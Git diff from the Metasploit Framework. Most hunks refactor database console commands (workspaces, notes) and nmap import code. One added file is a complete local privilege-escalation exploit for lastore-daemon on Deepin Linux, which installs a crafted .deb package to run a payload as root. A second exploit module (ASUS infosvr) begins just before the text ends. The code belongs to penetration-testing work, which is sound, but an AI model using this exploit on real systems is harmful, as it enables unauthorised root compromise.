@ -188,8 +238,6 @@ class Db
|
||||||
print_line("%red* #{current}%clr") unless current.nil?
|
print_line("%red* #{current}%clr") unless current.nil?
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
workspace = framework.db.workspace
|
|
||||||
|
|
||||||
col_names = %w{current name hosts services vulns creds loots notes}
|
col_names = %w{current name hosts services vulns creds loots notes}
|
||||||
|
|
||||||
tbl = Rex::Text::Table.new(
|
tbl = Rex::Text::Table.new(
|
||||||
|
@ -199,17 +247,16 @@ class Db
|
||||||
'SearchTerm' => search_term
|
'SearchTerm' => search_term
|
||||||
)
|
)
|
||||||
|
|
||||||
# List workspaces
|
framework.db.workspaces.each do |ws|
|
||||||
framework.db.workspace_associations_counts.each do |ws|
|
|
||||||
tbl << [
|
tbl << [
|
||||||
ws[:name] == workspace.name ? '*' : '',
|
current_workspace.name == ws.name ? '*' : '',
|
||||||
ws[:name],
|
ws.name,
|
||||||
ws[:hosts_count],
|
framework.db.hosts(ws.name).count,
|
||||||
ws[:services_count],
|
framework.db.services(ws.name).count,
|
||||||
ws[:vulns_count],
|
framework.db.vulns({workspace: ws.name}).count,
|
||||||
ws[:creds_count],
|
framework.db.creds({workspace: ws.name}).count,
|
||||||
ws[:loots_count],
|
framework.db.loots(ws.name).count,
|
||||||
ws[:notes_count]
|
framework.db.notes({workspace: ws.name}).count
|
||||||
]
|
]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -218,6 +265,19 @@ class Db
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def process_deleted_workspaces(deleted_workspaces, starting_ws)
|
||||||
|
deleted_workspaces.each do |ws|
|
||||||
|
print_status "Deleted workspace: #{ws.name}"
|
||||||
|
if ws.name == Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME
|
||||||
|
framework.db.workspace = framework.db.default_workspace
|
||||||
|
print_status 'Recreated the default workspace'
|
||||||
|
elsif ws == starting_ws
|
||||||
|
framework.db.workspace = framework.db.default_workspace
|
||||||
|
print_status "Switched to workspace: #{framework.db.workspace.name}"
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
def cmd_workspace_tabs(str, words)
|
def cmd_workspace_tabs(str, words)
|
||||||
return [] unless active?
|
return [] unless active?
|
||||||
framework.db.workspaces.map { |s| s.name } if (words & ['-a','--add']).empty?
|
framework.db.workspaces.map { |s| s.name } if (words & ['-a','--add']).empty?
|
||||||
|
@ -919,17 +979,17 @@ class Db
|
||||||
print_line " -a,--add Add a note to the list of addresses, instead of listing"
|
print_line " -a,--add Add a note to the list of addresses, instead of listing"
|
||||||
print_line " -d,--delete Delete the hosts instead of searching"
|
print_line " -d,--delete Delete the hosts instead of searching"
|
||||||
print_line " -n,--note <data> Set the data for a new note (only with -a)"
|
print_line " -n,--note <data> Set the data for a new note (only with -a)"
|
||||||
print_line " -t <type1,type2> Search for a list of types"
|
print_line " -t,--type <type1,type2> Search for a list of types, or set single type for add"
|
||||||
print_line " -h,--help Show this help information"
|
print_line " -h,--help Show this help information"
|
||||||
print_line " -R,--rhosts Set RHOSTS from the results of the search"
|
print_line " -R,--rhosts Set RHOSTS from the results of the search"
|
||||||
print_line " -S,--search Regular expression to match for search"
|
print_line " -S,--search Search string to filter by"
|
||||||
print_line " -o,--output Save the notes to a csv file"
|
print_line " -o,--output Save the notes to a csv file"
|
||||||
print_line " --sort <field1,field2> Fields to sort by (case sensitive)"
|
print_line " -O <column> Order rows by specified column number"
|
||||||
print_line
|
print_line
|
||||||
print_line "Examples:"
|
print_line "Examples:"
|
||||||
print_line " notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41"
|
print_line " notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41"
|
||||||
print_line " notes -t smb.fingerprint 10.1.1.34 10.1.20.41"
|
print_line " notes -t smb.fingerprint 10.1.1.34 10.1.20.41"
|
||||||
print_line " notes -S 'nmap.nse.(http|rtsp)' --sort type,output"
|
print_line " notes -S 'nmap.nse.(http|rtsp)'"
|
||||||
print_line
|
print_line
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -944,21 +1004,22 @@ class Db
|
||||||
host_ranges = []
|
host_ranges = []
|
||||||
rhosts = []
|
rhosts = []
|
||||||
search_term = nil
|
search_term = nil
|
||||||
out_file = nil
|
output_file = nil
|
||||||
|
delete_count = 0
|
||||||
|
|
||||||
while (arg = args.shift)
|
while (arg = args.shift)
|
||||||
case arg
|
case arg
|
||||||
when '-a','--add'
|
when '-a', '--add'
|
||||||
mode = :add
|
mode = :add
|
||||||
when '-d','--delete'
|
when '-d', '--delete'
|
||||||
mode = :delete
|
mode = :delete
|
||||||
when '-n','--note'
|
when '-n', '--note'
|
||||||
data = args.shift
|
data = args.shift
|
||||||
if(!data)
|
if(!data)
|
||||||
print_error("Can't make a note with no data")
|
print_error("Can't make a note with no data")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
when '-t'
|
when '-t', '--type'
|
||||||
typelist = args.shift
|
typelist = args.shift
|
||||||
if(!typelist)
|
if(!typelist)
|
||||||
print_error("Invalid type list")
|
print_error("Invalid type list")
|
||||||
|
@ -968,12 +1029,17 @@ class Db
|
||||||
when '-R', '--rhosts'
|
when '-R', '--rhosts'
|
||||||
set_rhosts = true
|
set_rhosts = true
|
||||||
when '-S', '--search'
|
when '-S', '--search'
|
||||||
search_term = /#{args.shift}/nmi
|
search_term = args.shift
|
||||||
when '--sort'
|
|
||||||
sort_term = args.shift
|
|
||||||
when '-o', '--output'
|
when '-o', '--output'
|
||||||
out_file = args.shift
|
output_file = args.shift
|
||||||
when '-h','--help'
|
when '-O'
|
||||||
|
if (order_by = args.shift.to_i - 1) < 0
|
||||||
|
print_error('Please specify a column number starting from 1')
|
||||||
|
return
|
||||||
|
end
|
||||||
|
when '-u', '--update' # TODO: This is currently undocumented because it's not officially supported.
|
||||||
|
mode = :update
|
||||||
|
when '-h', '--help'
|
||||||
cmd_notes_help
|
cmd_notes_help
|
||||||
return
|
return
|
||||||
else
|
else
|
||||||
|
@ -985,133 +1051,132 @@ class Db
|
||||||
end
|
end
|
||||||
|
|
||||||
if mode == :add
|
if mode == :add
|
||||||
if types.nil? or types.size != 1
|
if host_ranges.compact.empty?
|
||||||
print_error("Exactly one note type is required")
|
print_error("Host address or range required")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
|
if types && types.size != 1
|
||||||
|
print_error("Exactly one type is required")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
if data.nil?
|
||||||
|
print_error("Data required")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
type = types.first
|
type = types.first
|
||||||
host_ranges.each { |range|
|
host_ranges.each { |range|
|
||||||
range.each { |addr|
|
range.each { |addr|
|
||||||
host = framework.db.find_or_create_host(:host => addr)
|
note = framework.db.find_or_create_note(host: addr, type: type, data: data)
|
||||||
break if not host
|
|
||||||
note = framework.db.find_or_create_note(:host => host, :type => type, :data => data)
|
|
||||||
break if not note
|
break if not note
|
||||||
print_status("Time: #{note.created_at} Note: host=#{host.address} type=#{note.ntype} data=#{note.data}")
|
print_status("Time: #{note.created_at} Note: host=#{addr} type=#{note.ntype} data=#{note.data}")
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
note_list = []
|
if mode == :update
|
||||||
delete_count = 0
|
if types && types.size != 1
|
||||||
# No host specified - collect all notes
|
print_error("Exactly one type is required")
|
||||||
if host_ranges.empty?
|
return
|
||||||
note_list = framework.db.notes.dup
|
|
||||||
# Collect notes of specified hosts
|
|
||||||
else
|
|
||||||
each_host_range_chunk(host_ranges) do |host_search|
|
|
||||||
framework.db.hosts(framework.db.workspace, false, host_search).each do |host|
|
|
||||||
note_list.concat(host.notes)
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
if search_term
|
if !types && !data
|
||||||
note_list = note_list.select do |n|
|
print_error("Update requires data or type")
|
||||||
n.attribute_names.any? { |a| n[a.intern].to_s.match(search_term) }
|
return
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
# Sort the notes based on the sort_term provided
|
note_list = []
|
||||||
if sort_term != nil
|
if host_ranges.compact.empty?
|
||||||
sort_terms = sort_term.split(",")
|
# No host specified - collect all notes
|
||||||
note_list.sort_by! do |note|
|
opts = {search_term: search_term}
|
||||||
orderlist = []
|
opts[:ntype] = types if mode != :update && types && !types.empty?
|
||||||
sort_terms.each do |term|
|
note_list = framework.db.notes(opts)
|
||||||
term = "ntype" if term == "type"
|
else
|
||||||
term = "created_at" if term == "Time"
|
# Collect notes of specified hosts
|
||||||
if term == nil
|
each_host_range_chunk(host_ranges) do |host_search|
|
||||||
orderlist << ""
|
break if !host_search.nil? && host_search.empty?
|
||||||
elsif term == "service"
|
|
||||||
if note.service != nil
|
opts = {hosts: {address: host_search}, workspace: framework.db.workspace, search_term: search_term}
|
||||||
orderlist << make_sortable(note.service.name)
|
opts[:ntype] = types if mode != :update && types && !types.empty?
|
||||||
end
|
note_list.concat(framework.db.notes(opts))
|
||||||
elsif term == "port"
|
|
||||||
if note.service != nil
|
|
||||||
orderlist << make_sortable(note.service.port)
|
|
||||||
end
|
|
||||||
elsif term == "output"
|
|
||||||
orderlist << make_sortable(note.data["output"])
|
|
||||||
elsif note.respond_to?(term, true)
|
|
||||||
orderlist << make_sortable(note.send(term))
|
|
||||||
elsif note.respond_to?(term.to_sym, true)
|
|
||||||
orderlist << make_sortable(note.send(term.to_sym))
|
|
||||||
elsif note.respond_to?("data", true) && note.send("data").respond_to?(term, true)
|
|
||||||
orderlist << make_sortable(note.send("data").send(term))
|
|
||||||
elsif note.respond_to?("data", true) && note.send("data").respond_to?(term.to_sym, true)
|
|
||||||
orderlist << make_sortable(note.send("data").send(term.to_sym))
|
|
||||||
else
|
|
||||||
orderlist << ""
|
|
||||||
end
|
|
||||||
end
|
|
||||||
orderlist
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
# Now display them
|
# Now display them
|
||||||
csv_table = Rex::Text::Table.new(
|
table = Rex::Text::Table.new(
|
||||||
'Header' => 'Notes',
|
'Header' => 'Notes',
|
||||||
'Indent' => 1,
|
'Indent' => 1,
|
||||||
'Columns' => ['Time', 'Host', 'Service', 'Port', 'Protocol', 'Type', 'Data']
|
'Columns' => ['Time', 'Host', 'Service', 'Port', 'Protocol', 'Type', 'Data'],
|
||||||
|
'SortIndex' => order_by
|
||||||
)
|
)
|
||||||
|
|
||||||
|
matched_note_ids = []
|
||||||
note_list.each do |note|
|
note_list.each do |note|
|
||||||
next if(types and types.index(note.ntype).nil?)
|
if mode == :update
|
||||||
csv_note = []
|
begin
|
||||||
msg = "Time: #{note.created_at} Note:"
|
update_opts = {id: note.id}
|
||||||
csv_note << note.created_at if out_file
|
if types
|
||||||
if (note.host)
|
note.ntype = types.first
|
||||||
|
update_opts[:ntype] = types.first
|
||||||
|
end
|
||||||
|
|
||||||
|
if data
|
||||||
|
note.data = data
|
||||||
|
update_opts[:data] = data
|
||||||
|
end
|
||||||
|
|
||||||
|
framework.db.update_note(update_opts)
|
||||||
|
rescue Exception => e
|
||||||
|
elog "There was an error updating note with ID #{note.id}: #{e.message}"
|
||||||
|
next
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
matched_note_ids << note.id
|
||||||
|
|
||||||
|
row = []
|
||||||
|
row << note.created_at
|
||||||
|
|
||||||
|
if note.host
|
||||||
host = note.host
|
host = note.host
|
||||||
msg << " host=#{note.host.address}"
|
row << host.address
|
||||||
csv_note << note.host.address if out_file
|
|
||||||
if set_rhosts
|
if set_rhosts
|
||||||
addr = (host.scope ? host.address + '%' + host.scope : host.address )
|
addr = (host.scope ? host.address + '%' + host.scope : host.address)
|
||||||
rhosts << addr
|
rhosts << addr
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
csv_note << ''
|
row << ''
|
||||||
end
|
end
|
||||||
if (note.service)
|
|
||||||
msg << " service=#{note.service.name}" if note.service.name
|
if note.service
|
||||||
csv_note << note.service.name || '' if out_file
|
row << note.service.name || ''
|
||||||
msg << " port=#{note.service.port}" if note.service.port
|
row << note.service.port || ''
|
||||||
csv_note << note.service.port || '' if out_file
|
row << note.service.proto || ''
|
||||||
msg << " protocol=#{note.service.proto}" if note.service.proto
|
|
||||||
csv_note << note.service.proto || '' if out_file
|
|
||||||
else
|
else
|
||||||
if out_file
|
row << '' # For the Service field
|
||||||
csv_note << '' # For the Service field
|
row << '' # For the Port field
|
||||||
csv_note << '' # For the Port field
|
row << '' # For the Protocol field
|
||||||
csv_note << '' # For the Protocol field
|
|
||||||
end
|
|
||||||
end
|
|
||||||
msg << " type=#{note.ntype} data=#{note.data.inspect}"
|
|
||||||
if out_file
|
|
||||||
csv_note << note.ntype
|
|
||||||
csv_note << note.data.inspect
|
|
||||||
end
|
|
||||||
if out_file
|
|
||||||
csv_table << csv_note
|
|
||||||
else
|
|
||||||
print_status(msg)
|
|
||||||
end
|
|
||||||
if mode == :delete
|
|
||||||
note.destroy
|
|
||||||
delete_count += 1
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
row << note.ntype
|
||||||
|
row << note.data.inspect
|
||||||
|
table << row
|
||||||
end
|
end
|
||||||
|
|
||||||
if out_file
|
if mode == :delete
|
||||||
save_csv_notes(out_file, csv_table)
|
result = framework.db.delete_note(ids: matched_note_ids)
|
||||||
|
delete_count = result.size
|
||||||
|
end
|
||||||
|
|
||||||
|
if output_file
|
||||||
|
save_csv_notes(output_file, table)
|
||||||
|
else
|
||||||
|
print_line
|
||||||
|
print_line(table.to_s)
|
||||||
end
|
end
|
||||||
|
|
||||||
# Finally, handle the case where the user wants the resulting list
|
# Finally, handle the case where the user wants the resulting list
|
||||||
|
@ -1122,33 +1187,17 @@ class Db
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
def save_csv_notes(fpath, csv_table)
|
def save_csv_notes(fpath, table)
|
||||||
begin
|
begin
|
||||||
File.open(fpath, 'wb') do |f|
|
File.open(fpath, 'wb') do |f|
|
||||||
f.write(csv_table.to_csv)
|
f.write(table.to_csv)
|
||||||
end
|
end
|
||||||
print_status("Notes saved as #{fpath}")
|
print_status("Wrote notes to #{fpath}")
|
||||||
rescue Errno::EACCES => e
|
rescue Errno::EACCES => e
|
||||||
print_error("Unable to save notes. #{e.message}")
|
print_error("Unable to save notes. #{e.message}")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def make_sortable(input)
|
|
||||||
case input
|
|
||||||
when String
|
|
||||||
input = input.downcase
|
|
||||||
when Integer
|
|
||||||
input = "%016" % input
|
|
||||||
when Time
|
|
||||||
input = input.strftime("%Y%m%d%H%M%S%L")
|
|
||||||
when NilClass
|
|
||||||
input = ""
|
|
||||||
else
|
|
||||||
input = input.inspect.downcase
|
|
||||||
end
|
|
||||||
input
|
|
||||||
end
|
|
||||||
|
|
||||||
def cmd_loot_help
|
def cmd_loot_help
|
||||||
print_line "Usage: loot <options>"
|
print_line "Usage: loot <options>"
|
||||||
print_line " Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
|
print_line " Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
|
||||||
|
@ -1940,10 +1989,11 @@ class Db
|
||||||
end
|
end
|
||||||
|
|
||||||
endpoint = "#{protocol}://#{host}:#{port}"
|
endpoint = "#{protocol}://#{host}:#{port}"
|
||||||
remote_data_service = Metasploit::Framework::DataService::RemoteHTTPDataService.new(endpoint, https_opts)
|
remote_data_service = Metasploit::Framework::DataService::RemoteHTTPDataService.new(endpoint, framework, https_opts)
|
||||||
begin
|
begin
|
||||||
framework.db.register_data_service(remote_data_service)
|
framework.db.register_data_service(remote_data_service)
|
||||||
print_line "Registered data service: #{remote_data_service.name}"
|
print_line "Registered data service: #{remote_data_service.name}"
|
||||||
|
framework.db.workspace = framework.db.default_workspace
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
print_error "There was a problem registering the remote data service: #{e.message}"
|
print_error "There was a problem registering the remote data service: #{e.message}"
|
||||||
end
|
end
|
||||||
|
@ -1951,7 +2001,9 @@ class Db
|
||||||
|
|
||||||
def set_data_service(service_id)
|
def set_data_service(service_id)
|
||||||
begin
|
begin
|
||||||
framework.db.set_data_service(service_id)
|
data_service = framework.db.set_data_service(service_id)
|
||||||
|
framework.db.workspace = framework.db.default_workspace
|
||||||
|
data_service
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
print_error "Unable to set data service: #{e.message}"
|
print_error "Unable to set data service: #{e.message}"
|
||||||
end
|
end
|
||||||
|
|
|
@ -378,6 +378,7 @@ class Driver < Msf::Ui::Driver
|
||||||
print_warning("\t#{path}: #{error}")
|
print_warning("\t#{path}: #{error}")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
framework.db.workspace = framework.db.default_workspace
|
||||||
|
|
||||||
framework.events.on_ui_start(Msf::Framework::Revision)
|
framework.events.on_ui_start(Msf::Framework::Revision)
|
||||||
|
|
||||||
|
|
|
@ -1,19 +1,54 @@
|
||||||
module Msf
|
module Msf
|
||||||
module Util
|
module Util
|
||||||
module DBManager
|
module DBManager
|
||||||
# Creates search conditions to match the specified search string against all of the model's columns.
|
# Creates search conditions to match the specified search string against all of the model's columns.
|
||||||
#
|
#
|
||||||
# @param model - An ActiveRecord model object
|
# @param model - An ActiveRecord model object
|
||||||
# @param search - A string regex search
|
# @param search - A string regex search
|
||||||
# @return Arel::Nodes::Or object that represents a search of all of the model's columns
|
# @param column_name_skip_list - An array of strings containing column names to skip
|
||||||
def self.create_all_column_search_conditions(model, search)
|
# @return Arel::Nodes::Or object that represents a search of all of the model's columns
|
||||||
search = "(?mi)#{search}"
|
def self.create_all_column_search_conditions(model, search, column_name_skip_list=nil)
|
||||||
condition_set = model.columns.map do |column|
|
search = "(?mi)#{search}"
|
||||||
Arel::Nodes::Regexp.new(Arel::Nodes::NamedFunction.new("CAST", [model.arel_table[column.name].as("TEXT")]),
|
# remove skip columns
|
||||||
Arel::Nodes.build_quoted(search))
|
columns = model.columns.reject { |column|
|
||||||
end
|
column_name_skip_list && column_name_skip_list.include?(column.name)
|
||||||
condition_set.reduce { |conditions, condition| conditions.or(condition).expr }
|
}
|
||||||
end
|
|
||||||
|
condition_set = columns.map { |column|
|
||||||
|
Arel::Nodes::Regexp.new(Arel::Nodes::NamedFunction.new("CAST", [model.arel_table[column.name].as("TEXT")]),
|
||||||
|
Arel::Nodes.build_quoted(search))
|
||||||
|
}
|
||||||
|
condition_set.reduce { |conditions, condition| conditions.or(condition).expr }
|
||||||
|
end
|
||||||
|
|
||||||
|
# Processes the workspace value in the opts hash from a request. This method throws an exception if
|
||||||
|
# :workspace was not present but required was true, deletes the workspace from the hash, and
|
||||||
|
# looks up the workspace object by name, which it returns.
|
||||||
|
#
|
||||||
|
# @param [Hash] opts The opts hash passed in from the data request. Should contain :workspace if required is true.
|
||||||
|
# @param [Msf::Framework] framework A framework object containing a valid database connection.
|
||||||
|
# @param [Bool] required true if the :workspace key is required for this data operation. false if it is only optional.
|
||||||
|
# @return [Mdm::Workspace] The workspace object that was referenced by name in opts.
|
||||||
|
def self.process_opts_workspace(opts, framework, required = true)
|
||||||
|
wspace = delete_opts_workspace(opts)
|
||||||
|
if required && (wspace.nil? || ((wspace.kind_of? String) && wspace.empty?))
|
||||||
|
raise ArgumentError.new("opts must include a valid :workspace")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
if wspace.kind_of? String
|
||||||
|
wspace = framework.db.find_workspace(wspace)
|
||||||
|
end
|
||||||
|
wspace
|
||||||
|
end
|
||||||
|
|
||||||
|
# Removes the :workspace or :wspace key from the opts hash.
|
||||||
|
#
|
||||||
|
# @param [Hash] opts The opts hash passed in from the data request.
|
||||||
|
# @return [String] The name of the workspace that was contained in the key.
|
||||||
|
def self.delete_opts_workspace(opts)
|
||||||
|
wlog("Both :workspace and :wspace were found in opts. Using :workspace.") if opts[:workspace] && opts[:wspace]
|
||||||
|
opts.delete(:workspace) || opts.delete(:wspace)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
|
@ -376,12 +376,13 @@ module Rex
|
||||||
reported = []
|
reported = []
|
||||||
@report_data[:ports].each do |svc|
|
@report_data[:ports].each do |svc|
|
||||||
scripts = svc.delete(:scripts) || []
|
scripts = svc.delete(:scripts) || []
|
||||||
svc_obj = db_report(:service, svc.merge(:host => host_object))
|
wspace = db.workspaces({:id => host_object.workspace.id}).first
|
||||||
|
svc_obj = db_report(:service, svc.merge(:host => host_object, :workspace => wspace.name))
|
||||||
scripts.each do |script|
|
scripts.each do |script|
|
||||||
script.each_pair do |k,v|
|
script.each_pair do |k,v|
|
||||||
ntype =
|
ntype =
|
||||||
nse_note = {
|
nse_note = {
|
||||||
:workspace => host_object.workspace,
|
:workspace => wspace,
|
||||||
:host => host_object,
|
:host => host_object,
|
||||||
:service => svc_obj,
|
:service => svc_obj,
|
||||||
:type => "nmap.nse.#{k}." + (svc[:proto] || "tcp") +".#{svc[:port]}",
|
:type => "nmap.nse.#{k}." + (svc[:proto] || "tcp") +".#{svc[:port]}",
|
||||||
|
|
|
@ -138,7 +138,7 @@ Gem::Specification.new do |spec|
|
||||||
# Core of the Ruby Exploitation Library
|
# Core of the Ruby Exploitation Library
|
||||||
spec.add_runtime_dependency 'rex-core'
|
spec.add_runtime_dependency 'rex-core'
|
||||||
# Text manipulation library for things like generating random string
|
# Text manipulation library for things like generating random string
|
||||||
spec.add_runtime_dependency 'rex-text', ["< 0.2.18"]
|
spec.add_runtime_dependency 'rex-text'
|
||||||
# Library for Generating Randomized strings valid as Identifiers such as variable names
|
# Library for Generating Randomized strings valid as Identifiers such as variable names
|
||||||
spec.add_runtime_dependency 'rex-random_identifier'
|
spec.add_runtime_dependency 'rex-random_identifier'
|
||||||
# library for creating Powershell scripts for exploitation purposes
|
# library for creating Powershell scripts for exploitation purposes
|
||||||
|
|
|
@ -0,0 +1,172 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Local
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Post::File
|
||||||
|
include Msf::Post::Linux::Priv
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
include Msf::Exploit::FileDropper
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'lastore-daemon D-Bus Privilege Escalation',
|
||||||
|
'Description' => %q{
|
||||||
|
This module attempts to gain root privileges on Deepin Linux systems
|
||||||
|
by using lastore-daemon to install a package.
|
||||||
|
|
||||||
|
The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
|
||||||
|
user in the sudo group to install arbitrary system packages without
|
||||||
|
providing a password, resulting in code execution as root. By default,
|
||||||
|
the first user created on the system is a member of the sudo group.
|
||||||
|
|
||||||
|
This module has been tested successfully with lastore-daemon version
|
||||||
|
0.9.53-1 on Deepin Linux 15.5 (x64).
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
"King's Way", # Discovery and exploit
|
||||||
|
'Brendan Coles' # Metasploit
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Feb 2 2016',
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'EDB', '39433' ],
|
||||||
|
[ 'URL', 'https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8' ],
|
||||||
|
],
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||||
|
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
||||||
|
'Targets' => [[ 'Auto', {} ]],
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
register_options([
|
||||||
|
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def base_dir
|
||||||
|
datastore['WritableDir']
|
||||||
|
end
|
||||||
|
|
||||||
|
def mkdir(path)
|
||||||
|
vprint_status "Creating '#{path}' directory"
|
||||||
|
cmd_exec "mkdir -p #{path}"
|
||||||
|
register_dir_for_cleanup path
|
||||||
|
end
|
||||||
|
|
||||||
|
def upload(path, data)
|
||||||
|
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||||
|
rm_f path
|
||||||
|
write_file path, data
|
||||||
|
register_file_for_cleanup path
|
||||||
|
end
|
||||||
|
|
||||||
|
def upload_and_chmodx(path, data)
|
||||||
|
upload path, data
|
||||||
|
cmd_exec "chmod +x '#{path}'"
|
||||||
|
end
|
||||||
|
|
||||||
|
def command_exists?(cmd)
|
||||||
|
cmd_exec("command -v #{cmd} && echo true").include? 'true'
|
||||||
|
end
|
||||||
|
|
||||||
|
def dbus_priv?
|
||||||
|
res = install_package '', ''
|
||||||
|
(res.include? 'DBus.Error.AccessDenied') ? false : true
|
||||||
|
end
|
||||||
|
|
||||||
|
def install_package(name, path)
|
||||||
|
dbus_send dest: 'com.deepin.lastore',
|
||||||
|
type: 'method_call',
|
||||||
|
path: '/com/deepin/lastore',
|
||||||
|
interface: 'com.deepin.lastore.Manager.InstallPackage',
|
||||||
|
contents: "string:'#{name}' string:'#{path}'"
|
||||||
|
end
|
||||||
|
|
||||||
|
def remove_package(name)
|
||||||
|
dbus_send dest: 'com.deepin.lastore',
|
||||||
|
type: 'method_call',
|
||||||
|
path: '/com/deepin/lastore',
|
||||||
|
interface: 'com.deepin.lastore.Manager.RemovePackage',
|
||||||
|
contents: "string:' ' string:'#{name}'"
|
||||||
|
end
|
||||||
|
|
||||||
|
def dbus_send(dest:, type:, path:, interface:, contents:)
|
||||||
|
cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
%w(lastore-daemon dpkg-deb dbus-send).each do |cmd|
|
||||||
|
unless command_exists? cmd
|
||||||
|
vprint_error "#{cmd} is not installed. Exploitation will fail."
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
vprint_good "#{cmd} is installed"
|
||||||
|
end
|
||||||
|
|
||||||
|
unless dbus_priv?
|
||||||
|
vprint_error 'User is not permitted to install packages. Exploitation will fail.'
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
vprint_good 'User is permitted to install packages'
|
||||||
|
|
||||||
|
CheckCode::Appears
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
if is_root?
|
||||||
|
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||||
|
end
|
||||||
|
|
||||||
|
if check != CheckCode::Appears
|
||||||
|
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status 'Building package...'
|
||||||
|
|
||||||
|
payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
|
||||||
|
payload_path = "#{base_dir}/#{payload_name}"
|
||||||
|
pkg_name = rand_text_alphanumeric rand(10..15)
|
||||||
|
pkg_path = "#{base_dir}/.#{pkg_name}"
|
||||||
|
|
||||||
|
mkdir "#{pkg_path}/DEBIAN"
|
||||||
|
pkg = "Package: #{pkg_name}\n"
|
||||||
|
pkg << "Version: 0.1\n"
|
||||||
|
pkg << "Maintainer: #{pkg_name}\n"
|
||||||
|
pkg << "Architecture: all\n"
|
||||||
|
pkg << "Description: #{pkg_name}\n"
|
||||||
|
upload "#{pkg_path}/DEBIAN/control", pkg
|
||||||
|
upload_and_chmodx "#{pkg_path}/DEBIAN/postinst", "#!/bin/sh\n#{payload_path} &"
|
||||||
|
|
||||||
|
cmd_exec "dpkg-deb --build '#{pkg_path}'"
|
||||||
|
|
||||||
|
unless file_exist? "#{pkg_path}.deb"
|
||||||
|
fail_with Failure::Unknown, 'Building package failed'
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status 'Uploading payload...'
|
||||||
|
upload_and_chmodx payload_path, generate_payload_exe
|
||||||
|
|
||||||
|
print_status 'Installing package...'
|
||||||
|
res = install_package pkg_name, "#{pkg_path}.deb"
|
||||||
|
vprint_line res
|
||||||
|
|
||||||
|
unless res.include? 'object path'
|
||||||
|
fail_with Failure::Unknown, 'Package installation failed. Check /var/log/lastore/daemon.log'
|
||||||
|
end
|
||||||
|
|
||||||
|
Rex.sleep 15
|
||||||
|
|
||||||
|
print_status 'Removing package...'
|
||||||
|
res = remove_package pkg_name.downcase
|
||||||
|
vprint_line res
|
||||||
|
|
||||||
|
unless res.include? 'object path'
|
||||||
|
print_warning 'Package removal failed. Check /var/log/lastore/daemon.log'
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,141 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::Udp
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'ASUS infosvr Auth Bypass Command Execution',
|
||||||
|
'Description' => %q{
|
||||||
|
